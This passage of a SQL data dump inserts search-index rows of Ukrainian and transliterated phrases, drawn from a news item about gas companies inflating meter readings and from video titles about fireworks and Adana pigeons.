йдеться',0,1,1.7333,'л000',1,'*'),(1688411,'лічильника доступна','лічильника доступна',0,1,1.6333,'л000',1,'*'),(1688412,'лічильника доступна за','лічильника доступна за',0,1,1.7333,'л000',1,'*'),(1688413,'лічильника й','лічильника й',0,1,1.4,'л000',1,'*'),(1688414,'лічильника й вимагає','лічильника й вимагає',0,1,1.6667,'л000',1,'*'),(1688415,'лічильника можна','лічильника можна',0,1,1.5333,'л000',1,'*'),(1688416,'лічильника можна скачати','лічильника можна скачати',0,1,1.8,'л000',1,'*'),(1688417,'люди масово','люди масово',0,1,1.3667,'л000',1,'*'),(1688418,'люди масово скаржаться','люди масово скаржаться',0,1,1.7333,'л000',1,'*'),(1688419,'місяця','місяця',0,0,0.4,'м000',1,'*'),(1688420,'місяця що','місяця що',0,1,1.3,'м000',1,'*'),(1688421,'місяця що настає','місяця що настає',0,1,1.5333,'м000',1,'*'),(1688422,'мав би','мав би',0,1,1.2,'м000',1,'*'),(1688423,'мав би звернути','мав би звернути',0,1,1.5,'м000',1,'*'),(1688424,'маніпуляції','маніпуляції',0,0,0.7333,'м000',1,'*'),(1688425,'маніпуляції з','маніпуляції з',0,1,1.4333,'м000',1,'*'),(1688426,'маніпуляції з показниками','маніпуляції з показниками',0,1,1.8333,'м000',1,'*'),(1688427,'маніпуляцій','маніпуляцій',0,0,0.7333,'м000',1,'*'),(1688428,'маніпуляцій облгазів','маніпуляцій облгазів',0,1,1.6667,'м000',1,'*'),(1688429,'маніпуляцій облгазів це','маніпуляцій облгазів це',0,1,1.7667,'м000',1,'*'),(1688430,'масово','масово',0,0,0.4,'м000',1,'*'),(1688431,'масово скаржаться','масово скаржаться',0,1,1.5667,'м000',1,'*'),(1688432,'масово скаржаться на','масово скаржаться на',0,1,1.6667,'м000',1,'*'),(1688433,'метою отримання','метою отримання',0,1,1.5,'м000',1,'*'),(1688434,'метою отримання надприбутків','метою отримання надприбутків',0,1,1.9333,'м000',1,'*'),(1688435,'можна скачати','можна скачати',0,1,1.4333,'м000',1,'*'),(1688436,'можна скачати тут','можна скачати тут',0,1,1.5667,'м000',1,'*'),(1688437,'мотивуючи','мотивуючи',0,0,0.6,'м000',1,'*'),(1688438,'мотивуючи це','мотивуючи це',0,1,1.4,'м000',1,'*'),(1688439,'мотивуючи це тим','мотивуючи це тим',0,1,1.5333,'м000',1,'*'),(1688440,'ніж','ніж',0,0,0.2,'н000',1,'*'),(1688441,'ніж споживачі','ніж споживачі',0,1,1.4333,'н000',1,'*'),(1688442,'ніж споживачі фіксують','ніж споживачі фіксують',0,1,1.7333,'н000',1,'*'),(1688443,'на маніпуляції','на маніпуляції',0,1,1.4667,'н000',1,'*'),(1688444,'на маніпуляції з','на маніпуляції з',0,1,1.5333,'н000',1,'*'),(1688445,'на нашому','на нашому',0,1,1.3,'н000',1,'*'),(1688446,'на нашому сайті','на нашому сайті',0,1,1.5,'н000',1,'*'),(1688447,'на обурення','на обурення',0,1,1.3667,'н000',1,'*'),(1688448,'на обурення споживачів','на обурення споживачів',0,1,1.7333,'н000',1,'*'),(1688449,'на основі завищених','на основі завищених',0,1,1.6333,'н000',1,'*'),(1688450,'на такі','на такі',0,1,1.2333,'н000',1,'*'),(1688451,'на такі факти','на такі факти',0,1,1.4333,'н000',1,'*'),(1688452,'надали відповідну','надали відповідну',0,1,1.5667,'н000',1,'*'),(1688453,'надали відповідну інформацію','надали відповідну інформацію',0,1,1.9333,'н000',1,'*'),(1688454,'надприбутків','надприбутків',0,0,0.8,'н000',1,'*'),(1688455,'надприбутків при','надприбутків при',0,1,1.5333,'н000',1,'*'),(1688456,'надприбутків при нарахуванні','надприбутків при нарахуванні',0,1,1.9333,'н000',1,'*'),(1688457,'нарахуванні','нарахуванні',0,0,0.7333,'н000',1,'*'),(1688458,'нарахуванні плати','нарахуванні плати',0,1,1.5667,'н000',1,'*'),(1688459,'нарахуванні плати за','нарахуванні плати за',0,1,1.6667,'н000',1,'*'),(1688460,'нарахування на','нарахування на',0,1,1.4667,'н000',1,'*'),(1688461,'нарахування на основі','нарахування на основі',0,1,1.7,'н000',1,'*'),(1688462,'настає','настає',0,0,0.4,'н000',1,'*'),(1688463,'настає за','настає за',0,1,1.3,'н000',1,'*'),(1688464,'настає за розрахунковим','настає за розрахунковим',0,1,1.7667,'н000',1,'*'),(1688465,'натомість','натомість',0,0,0.6,'н000',1,'*'),(1688466,'натомість споживачам','натомість споживачам',0,1,1.6667,'н000',1,'*'),(1688467,'натомість споживачам виставляються','натомість споживачам виставляються',0,1,2,'н000',1,'*'),(1688468,'нашому сайті','нашому сайті',0,1,1.4,'н000',1,'*'),(1688469,'нашому сайті в','нашому сайті в',0,1,1.4667,'н000',1,'*'),(1688470,'не враховує','не враховує',0,1,1.3667,'н000',1,'*'),(1688471,'не враховує показники','не враховує показники',0,1,1.7,'н000',1,'*'),(1688472,'невчасно','невчасно',0,0,0.5333,'н000',1,'*'),(1688473,'невчасно надали','невчасно надали',0,1,1.5,'н000',1,'*'),(1688474,'невчасно надали відповідну','невчасно надали відповідну',0,1,1.8667,'н000',1,'*'),(1688475,'незаконні','незаконні',0,0,0.6,'н000',1,'*'),(1688476,'незаконні нарахування','незаконні нарахування',0,1,1.7,'н000',1,'*'),(1688477,'незаконні нарахування на','незаконні нарахування на',0,1,1.8,'н000',1,'*'),(1688478,'незважаючи','незважаючи',0,0,0.6667,'н000',1,'*'),(1688479,'незважаючи на','незважаючи на',0,1,1.4333,'н000',1,'*'),(1688480,'незважаючи на обурення','незважаючи на обурення',0,1,1.7333,'н000',1,'*'),(1688481,'нкрекп','нкрекп',0,0,0.4,'н000',1,'*'),(1688482,'нкрекп адже','нкрекп адже',0,1,1.3667,'н000',1,'*'),(1688483,'нкрекп адже часто','нкрекп адже часто',0,1,1.5667,'н000',1,'*'),(1688484,'облгаз буде','облгаз буде',0,1,1.3667,'о000',1,'*'),(1688485,'облгаз буде здійснювати','облгаз буде здійснювати',0,1,1.7667,'о000',1,'*'),(1688486,'облгаз не','облгаз не',0,1,1.3,'о000',1,'*'),(1688487,'облгаз не враховує','облгаз не враховує',0,1,1.6,'о000',1,'*'),(1688488,'облгазів','облгазів',0,0,0.5333,'о000',1,'*'),(1688489,'облгазів це','облгазів це',0,1,1.3667,'о000',1,'*'),(1688490,'облгазів це штучне','облгазів це штучне',0,1,1.6,'о000',1,'*'),(1688491,'облгази','облгази',0,0,0.4667,'о000',1,'*'),(1688492,'облгази ігнорують','облгази ігнорують',0,1,1.5667,'о000',1,'*'),(1688493,'облгази ігнорують вчасно','облгази ігнорують вчасно',0,1,1.8,'о000',1,'*'),(1688494,'облгази відмовляються','облгази відмовляються',0,1,1.7,'о000',1,'*'),(1688495,'облгази відмовляються коригувати','облгази відмовляються коригувати',0,1,2,'о000',1,'*'),(1688496,'облгазу а','облгазу а',0,1,1.3,'о000',1,'*'),(1688497,'облгазу а також','облгазу а також',0,1,1.5,'о000',1,'*'),(1688498,'облгазу щодо','облгазу щодо',0,1,1.4,'о000',1,'*'),(1688499,'облгазу щодо здійснення','облгазу щодо здійснення',0,1,1.7667,'о000',1,'*'),(1688500,'обурення','обурення',0,0,0.5333,'о000',1,'*'),(1688501,'обурення споживачів','обурення споживачів',0,1,1.6333,'о000',1,'*'),(1688502,'обурення споживачів облгази','обурення споживачів облгази',0,1,1.9,'о000',1,'*'),(1688503,'одна','одна',0,0,0.2667,'о000',1,'*'),(1688504,'одна з','одна з',0,1,1.2,'о000',1,'*'),(1688505,'одна з ймовірних','одна з ймовірних',0,1,1.5333,'о000',1,'*'),(1688506,'одразу','одразу',0,0,0.4,'о000',1,'*'),(1688507,'одразу скаргу','одразу скаргу',0,1,1.4333,'о000',1,'*'),(1688508,'одразу скаргу до','одразу скаргу до',0,1,1.5333,'о000',1,'*'),(1688509,'основі завищених','основі завищених',0,1,1.5333,'о000',1,'*'),(1688510,'основі завищених показників','основі завищених показників',0,1,1.9,'о000',1,'*'),(1688511,'особистих','особистих',0,0,0.6,'о000',1,'*'),(1688512,'особистих кабінетах','особистих кабінетах',0,1,1.6333,'о000',1,'*'),(1688513,'особистих кабінетах незважаючи','особистих кабінетах незважаючи',0,1,2,'о000',1,'*'),(1688514,'отримання','отримання',0,0,0.6,'о000',1,'*'),(1688515,'отримання надприбутків','отримання надприбутків',0,1,1.7333,'о000',1,'*'),(1688516,'отримання надприбутків при','отримання надприбутків при',0,1,1.8667,'о000',1,'*'),(1688517,'підготувала','підготувала',0,0,0.7333,'п000',1,'*'),(1688518,'підготувала зразки','підготувала зразки',0,1,1.6,'п000',1,'*'),(1688519,'підготувала зразки таких','підготувала зразки таких',0,1,1.8,'п000',1,'*'),(1688520,'пізніше','пізніше',0,0,0.4667,'п000',1,'*'),(1688521,'пізніше 6','пізніше 6',0,1,1.3,'п000',1,'*'),(1688522,'пізніше 6 числа','пізніше 6 числа',0,1,1.5,'п000',1,'*'),(1688523,'палива у','палива у',0,1,1.2667,'п000',1,'*'),(1688524,'палива у 2022','палива у 2022',0,1,1.4333,'п000',1,'*'),(1688525,'передані','передані',0,0,0.5333,'п000',1,'*'),(1688526,'передані домогосподарствами','передані домогосподарствами',0,1,1.9,'п000',1,'*'),(1688527,'передані домогосподарствами показники','передані домогосподарствами показники',0,1,2,'п000',1,'*'),(1688528,'перерахунку за','перерахунку за',0,1,1.4667,'п000',1,'*'),(1688529,'перерахунку за фактичними','перерахунку за фактичними',0,1,1.8333,'п000',1,'*'),(1688530,'подібних','подібних',0,0,0.5333,'п000',1,'*'),(1688531,'подібних маніпуляцій','подібних маніпуляцій',0,1,1.6667,'п000',1,'*'),(1688532,'подібних маніпуляцій облгазів','подібних маніпуляцій облгазів',0,1,1.9667,'п000',1,'*'),(1688533,'подавати','подавати',0,0,0.5333,'п000',1,'*'),(1688534,'подавати претензію','подавати претензію',0,1,1.6,'п000',1,'*'),(1688535,'подавати претензію щодо','подавати претензію щодо',0,1,1.7667,'п000',1,'*'),(1688536,'показів','показів',0,0,0.4667,'п000',1,'*'),(1688537,'показів лічильників','показів лічильників',0,1,1.6333,'п000',1,'*'),(1688538,'показів лічильників до','показів лічильників до',0,1,1.7333,'п000',1,'*'),(1688539,'показників','показників',0,0,0.6667,'п000',1,'*'),(1688540,'показників лічильника','показників лічильника',0,1,1.7,'п000',1,'*'),(1688541,'показників лічильника доступна','показників лічильника доступна',0,1,2,'п000',1,'*'),(1688542,'показниками газових','показниками газових',0,1,1.6333,'п000',1,'*'),(1688543,'показниками газових лічильників','показниками газових лічильників',0,1,2,'п000',1,'*'),(1688544,'показниками лічильника','показниками лічильника',0,1,1.7333,'п000',1,'*'),(1688545,'показниками лічильника можна','показниками лічильника можна',0,1,1.9333,'п000',1,'*'),(1688546,'показники','показники',0,0,0.6,'п000',1,'*'),(1688547,'показники вашого','показники вашого',0,1,1.5333,'п000',1,'*'),(1688548,'показники вашого лічильника','показники вашого лічильника',0,1,1.9,'п000',1,'*'),(1688549,'показники значно','показники значно',0,1,1.5333,'п000',1,'*'),(1688550,'показники значно вищі','показники значно вищі',0,1,1.7,'п000',1,'*'),(1688551,'показники лічильників','показники лічильників',0,1,1.7,'п000',1,'*'),(1688552,'показники лічильників мотивуючи','показники лічильників мотивуючи',0,1,2,'п000',1,'*'),(1688553,'показники лічильників натомість','показники лічильників натомість',0,1,2,'п000',1,'*'),(1688554,'посиланням https gazpravda','посиланням https gazpravda',0,1,1.8667,'п3121613',1,'*'),(1688555,'поточному','поточному',0,0,0.6,'п000',1,'*'),(1688556,'поточному газовому','поточному газовому',0,1,1.6,'п000',1,'*'),(1688557,'поточному газовому році','поточному газовому році',0,1,1.7667,'п000',1,'*'),(1688558,'претензій','претензій',0,0,0.6,'п000',1,'*'),(1688559,'претензій та','претензій та',0,1,1.4,'п000',1,'*'),(1688560,'претензій та скарг','претензій та скарг',0,1,1.6,'п000',1,'*'),(1688561,'претензію','претензію',0,0,0.6,'п000',1,'*'),(1688562,'претензію до','претензію до',0,1,1.4,'п000',1,'*'),(1688563,'претензію до облгазу','претензію до облгазу',0,1,1.6667,'п000',1,'*'),(1688564,'претензію щодо','претензію щодо',0,1,1.4667,'п000',1,'*'),(1688565,'претензію щодо завищених','претензію щодо завищених',0,1,1.8,'п000',1,'*'),(1688566,'при нарахуванні','при нарахуванні',0,1,1.5,'п000',1,'*'),(1688567,'при нарахуванні плати','при нарахуванні плати',0,1,1.7,'п000',1,'*'),(1688568,'причин подібних','причин подібних',0,1,1.5,'п000',1,'*'),(1688569,'причин подібних маніпуляцій','причин подібних маніпуляцій',0,1,1.9,'п000',1,'*'),(1688570,'про незаконні','про незаконні',0,1,1.4333,'п000',1,'*'),(1688571,'про незаконні нарахування','про незаконні нарахування',0,1,1.8333,'п000',1,'*'),(1688572,'просто ігнорує','просто ігнорує',0,1,1.4667,'п000',1,'*'),(1688573,'просто ігнорує звернення','просто ігнорує звернення',0,1,1.8,'п000',1,'*'),(1688574,'протягом усього','протягом усього',0,1,1.5,'п000',1,'*'),(1688575,'протягом усього 2022','протягом усього 2022',0,1,1.6667,'п000',1,'*'),(1688576,'радять','радять',0,0,0.4,'р000',1,'*'),(1688577,'радять подавати','радять подавати',0,1,1.5,'р000',1,'*'),(1688578,'радять подавати претензію','радять подавати претензію',0,1,1.8333,'р000',1,'*'),(1688579,'разі експерти','разі експерти',0,1,1.4333,'р000',1,'*'),(1688580,'разі експерти газправди','разі експерти газправди',0,1,1.7667,'р000',1,'*'),(1688581,'регулятор','регулятор',0,0,0.6,'р000',1,'*'),(1688582,'регулятор мав','регулятор мав',0,1,1.4333,'р000',1,'*'),(1688583,'регулятор мав би','регулятор мав би',0,1,1.5333,'р000',1,'*'),(1688584,'регулятора','регулятора',0,0,0.6667,'р000',1,'*'),(1688585,'регулятора про','регулятора про',0,1,1.4667,'р000',1,'*'),(1688586,'регулятора про незаконні','регулятора про незаконні',0,1,1.8,'р000',1,'*'),(1688587,'робити якщо','робити якщо',0,1,1.3667,'р000',1,'*'),(1688588,'робити якщо облгаз','робити якщо облгаз',0,1,1.6,'р000',1,'*'),(1688589,'розділі','розділі',0,0,0.4667,'р000',1,'*'),(1688590,'розділі бланки','розділі бланки',0,1,1.4667,'р000',1,'*'),(1688591,'розділі бланки також','розділі бланки також',0,1,1.6667,'р000',1,'*'),(1688592,'розміщені','розміщені',0,0,0.6,'р000',1,'*'),(1688593,'розміщені на','розміщені на',0,1,1.4,'р000',1,'*'),(1688594,'розміщені на нашому','розміщені на нашому',0,1,1.6333,'р000',1,'*'),(1688595,'розподіл','розподіл',0,0,0.5333,'р000',1,'*'),(1688596,'розподіл блакитного','розподіл блакитного',0,1,1.6333,'р000',1,'*'),(1688597,'розподіл блакитного палива','розподіл блакитного палива',0,1,1.8667,'р000',1,'*'),(1688598,'розподіл газу','розподіл газу',0,1,1.4333,'р000',1,'*'),(1688599,'розподіл газу кожному','розподіл газу кожному',0,1,1.7,'р000',1,'*'),(1688600,'розрахунковим','розрахунковим',0,0,0.8667,'р000',1,'*'),(1688601,'розрахунковим у','розрахунковим у',0,1,1.5,'р000',1,'*'),(1688602,'розрахунковим у такому','розрахунковим у такому',0,1,1.7333,'р000',1,'*'),(1688603,'року за матеріалами','року за матеріалами',0,1,1.6333,'р000',1,'*'),(1688604,'року облгаз','року облгаз',0,1,1.3667,'р000',1,'*'),(1688605,'року облгаз буде','року облгаз буде',0,1,1.5333,'р000',1,'*'),(1688606,'року та протягом','року та протягом',0,1,1.5333,'р000',1,'*'),(1688607,'році адже','році адже',0,1,1.3,'р000',1,'*'),(1688608,'році адже саме','році адже саме',0,1,1.4667,'р000',1,'*'),(1688609,'році з','році з',0,1,1.2,'р000',1,'*'),(1688610,'році з метою','році з метою',0,1,1.4,'р000',1,'*'),(1688611,'сайті в','сайті в',0,1,1.2333,'с000',1,'*'),(1688612,'сайті в розділі','сайті в розділі',0,1,1.5,'с000',1,'*'),(1688613,'свою увагу','свою увагу',0,1,1.3333,'с000',1,'*'),(1688614,'свою увагу на','свою увагу на',0,1,1.4333,'с000',1,'*'),(1688615,'скарг','скарг',0,0,0.3333,'с000',1,'*'),(1688616,'скарг документи','скарг документи',0,1,1.5,'с000',1,'*'),(1688617,'скарг документи розміщені','скарг документи розміщені',0,1,1.8333,'с000',1,'*'),(1688618,'скарга','скарга',0,0,0.4,'с000',1,'*'),(1688619,'скарга до','скарга до',0,1,1.3,'с000',1,'*'),(1688620,'скарга до регулятора','скарга до регулятора',0,1,1.6667,'с000',1,'*'),(1688621,'скаргу','скаргу',0,0,0.4,'с000',1,'*'),(1688622,'скаргу до','скаргу до',0,1,1.3,'с000',1,'*'),(1688623,'скаргу до нкрекп','скаргу до нкрекп',0,1,1.5333,'с000',1,'*'),(1688624,'скаржаться','скаржаться',0,0,0.6667,'с000',1,'*'),(1688625,'скаржаться на','скаржаться на',0,1,1.4333,'с000',1,'*'),(1688626,'скаржаться на маніпуляції','скаржаться на маніпуляції',0,1,1.8333,'с000',1,'*'),(1688627,'скачати','скачати',0,0,0.4667,'с000',1,'*'),(1688628,'скачати тут','скачати тут',0,1,1.3667,'с000',1,'*'),(1688629,'скачати тут https','скачати тут https',0,1,1.5667,'с312',1,'*'),(1688630,'сплатити','сплатити',0,0,0.5333,'с000',1,'*'),(1688631,'сплатити за','сплатити за',0,1,1.3667,'с000',1,'*'),(1688632,'сплатити за «зайві»','сплатити за «зайві»',0,1,1.6333,'с000',1,'*'),(1688633,'споживання газу','споживання газу',0,1,1.5,'с000',1,'*'),(1688634,'споживання газу домогосподарствами','споживання газу домогосподарствами',0,1,2,'с000',1,'*'),(1688635,'споживачі фіксують','споживачі фіксують',0,1,1.6,'с000',1,'*'),(1688636,'споживачі фіксують в','споживачі фіксують в',0,1,1.6667,'с000',1,'*'),(1688637,'споживачів','споживачів',0,0,0.6667,'с000',1,'*'),(1688638,'споживачів облгази','споживачів облгази',0,1,1.6,'с000',1,'*'),(1688639,'споживачів облгази відмовляються','споживачів облгази відмовляються',0,1,2,'с000',1,'*'),(1688640,'споживачам виставляються','споживачам виставляються',0,1,1.8,'с000',1,'*'),(1688641,'споживачам виставляються інші','споживачам виставляються інші',0,1,1.9667,'с000',1,'*'),(1688642,'споживачам тому','споживачам тому',0,1,1.5,'с000',1,'*'),(1688643,'споживачам тому регулятор','споживачам тому регулятор',0,1,1.8333,'с000',1,'*'),(1688644,'ті невчасно','ті невчасно',0,1,1.3667,'т000',1,'*'),(1688645,'ті невчасно надали','ті невчасно надали',0,1,1.6,'т000',1,'*'),(1688646,'та протягом','та протягом',0,1,1.3667,'т000',1,'*'),(1688647,'та протягом усього','та протягом усього',0,1,1.6,'т000',1,'*'),(1688648,'та скарг','та скарг',0,1,1.2667,'т000',1,'*'),(1688649,'та скарг документи','та скарг документи',0,1,1.6,'т000',1,'*'),(1688650,'такі факти','такі факти',0,1,1.3333,'т000',1,'*'),(1688651,'такі факти газправда','такі факти газправда',0,1,1.6667,'т000',1,'*'),(1688652,'таких','таких',0,0,0.3333,'т000',1,'*'),(1688653,'таких претензій','таких претензій',0,1,1.5,'т000',1,'*'),(1688654,'таких претензій та','таких претензій та',0,1,1.6,'т000',1,'*'),(1688655,'також одразу','також одразу',0,1,1.4,'т000',1,'*'),(1688656,'також одразу скаргу','також одразу скаргу',0,1,1.6333,'т000',1,'*'),(1688657,'також претензію','також претензію',0,1,1.5,'т000',1,'*'),(1688658,'також претензію до','також претензію до',0,1,1.6,'т000',1,'*'),(1688659,'такому','такому',0,0,0.4,'т000',1,'*'),(1688660,'такому разі','такому разі',0,1,1.3667,'т000',1,'*'),(1688661,'такому разі експерти','такому разі експерти',0,1,1.6667,'т000',1,'*'),(1688662,'тим','тим',0,0,0.2,'т000',1,'*'),(1688663,'тим що','тим що',0,1,1.2,'т000',1,'*'),(1688664,'тим що ті','тим що ті',0,1,1.3,'т000',1,'*'),(1688665,'тобто пізніше','тобто пізніше',0,1,1.4333,'т000',1,'*'),(1688666,'тобто пізніше 6','тобто пізніше 6',0,1,1.5,'т000',1,'*'),(1688667,'тому регулятор','тому регулятор',0,1,1.4667,'т000',1,'*'),(1688668,'тому регулятор мав','тому регулятор мав',0,1,1.6,'т000',1,'*'),(1688669,'тут','тут',0,0,0.2,'т000',1,'*'),(1688670,'тут https','тут https',0,1,1.3,'т312',1,'*'),(1688671,'тут https gazpravda','тут https gazpravda',0,1,1.6333,'т3121613',1,'*'),(1688672,'у 2022','у 2022',0,1,1.2,'у000',1,'*'),(1688673,'у 2022 році','у 2022 році',0,1,1.3667,'у000',1,'*'),(1688674,'у такому','у такому',0,1,1.2667,'у000',1,'*'),(1688675,'у такому разі','у такому разі',0,1,1.4333,'у000',1,'*'),(1688676,'увагу на такі','увагу на такі',0,1,1.4333,'у000',1,'*'),(1688677,'фіксують','фіксують',0,0,0.5333,'ф000',1,'*'),(1688678,'фіксують в','фіксують в',0,1,1.3333,'ф000',1,'*'),(1688679,'фіксують в особистих','фіксують в особистих',0,1,1.6667,'ф000',1,'*'),(1688680,'факти','факти',0,0,0.3333,'ф000',1,'*'),(1688681,'факти газправда','факти газправда',0,1,1.5,'ф000',1,'*'),(1688682,'факти газправда підготувала','факти газправда підготувала',0,1,1.9,'ф000',1,'*'),(1688683,'фактичними','фактичними',0,0,0.6667,'ф000',1,'*'),(1688684,'фактичними показниками','фактичними показниками',0,1,1.7333,'ф000',1,'*'),(1688685,'фактичними показниками лічильника','фактичними показниками лічильника',0,1,2,'ф000',1,'*'),(1688686,'фактичного споживання','фактичного споживання',0,1,1.7,'ф000',1,'*'),(1688687,'фактичного споживання газу','фактичного споживання газу',0,1,1.8667,'ф000',1,'*'),(1688688,'це тим','це тим',0,1,1.2,'ц000',1,'*'),(1688689,'це тим що','це тим що',0,1,1.3,'ц000',1,'*'),(1688690,'це штучне','це штучне',0,1,1.3,'ц000',1,'*'),(1688691,'це штучне завищення','це штучне завищення',0,1,1.6333,'ц000',1,'*'),(1688692,'центру','центру',0,0,0.4,'ц000',1,'*'),(1688693,'центру газправда','центру газправда',0,1,1.5333,'ц000',1,'*'),(1688694,'центру газправда облгази','центру газправда облгази',0,1,1.8,'ц000',1,'*'),(1688695,'часто газорозподільна','часто газорозподільна',0,1,1.7,'ч000',1,'*'),(1688696,'часто газорозподільна компанія','часто газорозподільна компанія',0,1,2,'ч000',1,'*'),(1688697,'числа','числа',0,0,0.3333,'ч000',1,'*'),(1688698,'числа календарного','числа календарного',0,1,1.6,'ч000',1,'*'),(1688699,'числа календарного місяця','числа календарного місяця',0,1,1.8333,'ч000',1,'*'),(1688700,'штучне','штучне',0,0,0.4,'ш000',1,'*'),(1688701,'штучне завищення','штучне завищення',0,1,1.5333,'ш000',1,'*'),(1688702,'штучне завищення фактичного','штучне завищення фактичного',0,1,1.9,'ш000',1,'*'),(1688703,'що настає','що настає',0,1,1.3,'щ000',1,'*'),(1688704,'що настає за','що настає за',0,1,1.4,'щ000',1,'*'),(1688705,'що одна','що одна',0,1,1.2333,'щ000',1,'*'),(1688706,'що одна з','що одна з',0,1,1.3,'щ000',1,'*'),(1688707,'що робити','що робити',0,1,1.3,'щ000',1,'*'),(1688708,'що робити якщо','що робити якщо',0,1,1.4667,'щ000',1,'*'),(1688709,'що ті','що ті',0,1,1.1667,'щ000',1,'*'),(1688710,'що ті невчасно','що ті невчасно',0,1,1.4667,'щ000',1,'*'),(1688711,'щодо завищених','щодо завищених',0,1,1.4667,'щ000',1,'*'),(1688712,'щодо завищених показів','щодо завищених показів',0,1,1.7333,'щ000',1,'*'),(1688713,'щодо здійснення','щодо здійснення',0,1,1.5,'щ000',1,'*'),(1688714,'щодо здійснення перерахунку','щодо здійснення перерахунку',0,1,1.9,'щ000',1,'*'),(1688715,'як йдеться','як йдеться',0,1,1.3333,'я000',1,'*'),(1688716,'як йдеться в','як йдеться в',0,1,1.4,'я000',1,'*'),(1688717,'якщо облгаз','якщо облгаз',0,1,1.3667,'я000',1,'*'),(1688718,'якщо облгаз не','якщо облгаз не',0,1,1.4667,'я000',1,'*'),(1689236,'2 2538','2 2538',0,1,1.2,'',1,'*'),(1689237,'2 2538 prosto','2 2538 prosto',0,1,1.4333,'P623',1,'*'),(1689238,'2538','2538',0,0,0.4,'',1,'*'),(1689239,'2538 prosto','2538 prosto',0,1,1.3667,'P623',1,'*'),(1689240,'2538 prosto shedevralnij','2538 prosto shedevralnij',0,1,1.8,'P6232316452',1,'*'),(1689241,'novini 2 2538','novini 2 2538',0,1,1.4333,'N150',1,'*'),(1689242,'novorichnij','novorichnij',0,0,0.7333,'N16252',1,'*'),(1689243,'novorichnij salyut','novorichnij salyut',0,1,1.6,'N1625243',1,'*'),(1689244,'prosto','prosto',0,0,0.4,'P623',1,'*'),(1689245,'prosto shedevralnij','prosto shedevralnij',0,1,1.6333,'P6232316452',1,'*'),(1689246,'prosto shedevralnij novorichnij','prosto shedevralnij novorichnij',0,1,2,'P6232316452516252',1,'*'),(1689247,'salyut','salyut',0,0,0.4,'S430',1,'*'),(1689248,'shedevralnij','shedevralnij',0,0,0.8,'S316452',1,'*'),(1689249,'shedevralnij novorichnij','shedevralnij novorichnij',0,1,1.8,'S316452516252',1,'*'),(1689250,'shedevralnij novorichnij salyut','shedevralnij novorichnij salyut',0,1,2,'S31645251625243',1,'*'),(1689251,'новорічний','новорічний',0,0,0.6667,'н000',1,'*'),(1689252,'новорічний салют','новорічний салют',0,1,1.5333,'н000',1,'*'),(1689253,'просто шедевральний','просто шедевральний',0,1,1.6333,'п000',1,'*'),(1689254,'просто шедевральний новорічний','просто шедевральний новорічний',0,1,2,'п000',1,'*'),(1689255,'салют','салют',0,0,0.3333,'с000',1,'*'),(1689256,'шедевральний','шедевральний',0,0,0.8,'ш000',1,'*'),(1689257,'шедевральний новорічний','шедевральний новорічний',0,1,1.7667,'ш000',1,'*'),(1689258,'шедевральний новорічний салют','шедевральний новорічний салют',0,1,1.9667,'ш000',1,'*'),(1689267,'137','137',0,0,0.3,'',1,'*'),(1689268,'137 adana','137 adana',0,1,1.3,'A350',1,'*'),(1689269,'137 adana turetska','137 adana turetska',0,1,1.6,'A353632',1,'*'),(1689270,'adana','adana',0,0,0.3333,'A350',4,'*'),(1689271,'adana turetska','adana turetska',0,1,1.4667,'A353632',4,'*'),(1689272,'holuby 137','holuby 137',0,1,1.3333,'H410',1,'*'),(1689273,'holuby 137 adana','holuby 137 adana',0,1,1.5333,'H4135',1,'*'),(1689274,'turetska','turetska',0,0,0.5333,'T632',4,'*'),(1689275,'адана','адана',0,0,0.3333,'а000',2,'*'),(1689276,'адана турецька','адана турецька',0,1,1.4667,'а000',1,'*'),(1689277,'турецька','турецька',0,0,0.5333,'т000',2,'*'),(1689282,'2539','2539',0,0,0.4,'',1,'*'),(1689283,'2539 posadka','2539 posadka',0,1,1.4,'P232',1,'*'),(1689284,'2539 posadka turetskoji','2539 posadka turetskoji',0,1,1.7667,'P2323632',1,'*'),(1689285,'adana turetska 2539','adana turetska 2539',0,1,1.6333,'A353632',1,'*'),(1689286,'adani','adani',0,0,0.3333,'A350',1,'*'),(1689287,'holuby adana','holuby adana',0,1,1.4,'H4135',3,'*'),(1689288,'holuby adana turetska','holuby adana turetska',0,1,1.7,'H41353632',3,'*'),(1689289,'posadka','posadka',0,0,0.4667,'P232',1,'*'),(1689290,'posadka turetskoji','posadka turetskoji',0,1,1.6,'P2323632',1,'*'),(1689291,'posadka turetskoji adani','posadka turetskoji adani',0,1,1.8,'P232363235',1,'*'),(1689292,'turetska 2539','turetska 2539',0,1,1.4333,'T632',1,'*'),(1689293,'turetska 2539 posadka','turetska 2539 posadka',0,1,1.7,'T6321232',1,'*'),(1689294,'turetskoji','turetskoji',0,0,0.6667,'T632',1,'*'),(1689295,'turetskoji adani','turetskoji adani',0,1,1.5333,'T63235',1,'*'),(1689296,'адани','адани',0,0,0.3333,'а000',1,'*'),(1689297,'посадка','посадка',0,0,0.4667,'п000',1,'*'),(1689298,'посадка турецької','посадка турецької',0,1,1.5667,'п000',1,'*'),(1689299,'посадка турецької адани','посадка турецької адани',0,1,1.7667,'п000',1,'*'),(1689300,'турецької','турецької',0,0,0.6,'т000',1,'*'),(1689301,'турецької адани','турецької адани',0,1,1.5,'т000',1,'*'),(1689313,'2540','2540',0,0,0.4,'',1,'*'),(1689314,'2540 moya','2540 moya',0,1,1.3,'M000',1,'*'),(1689315,'2540 moya para','2540 moya para',0,1,1.4667,'M160',1,'*'),(1689316,'adana turetska 2540','adana turetska 2540',0,1,1.6333,'A353632',1,'*'),(1689317,'moya','moya',0,0,0.2667,'M000',1,'*'),(1689318,'moya para','moya para',0,1,1.3,'M160',1,'*'),(1689319,'moya para podarok','moya para podarok',0,1,1.5667,'M161362',1,'*'),(1689320,'oblako','oblako',0,0,0.4,'O142',1,'*'),(1689321,'para podarok','para podarok',0,1,1.4,'P61362',1,'*'),(1689322,'para podarok vid','para podarok vid',0,1,1.5333,'P6136213',1,'*'),(1689323,'podarok','podarok',0,0,0.4667,'P362',1,'*'),(1689324,'podarok vid','podarok vid',0,1,1.3667,'P36213',1,'*'),(1689325,'podarok vid oblako','podarok vid oblako',0,1,1.6,'P36213142',1,'*'),(1689326,'turetska 2540','turetska 2540',0,1,1.4333,'T632',1,'*'),(1689327,'turetska 2540 moya','turetska 2540 moya',0,1,1.6,'T6325',1,'*'),(1689328,'vid','vid',0,0,0.2,'V300',1,'*'),(1689329,'vid oblako','vid oblako',0,1,1.3333,'V3142',1,'*'),(1689330,'від oblako','від oblako',0,1,1.3333,'в142',1,'*'),(1689331,'моя','моя',0,0,0.2,'м000',1,'*'),(1689332,'моя пара','моя пара',0,1,1.2667,'м000',1,'*'),(1689333,'моя пара подарок','моя пара 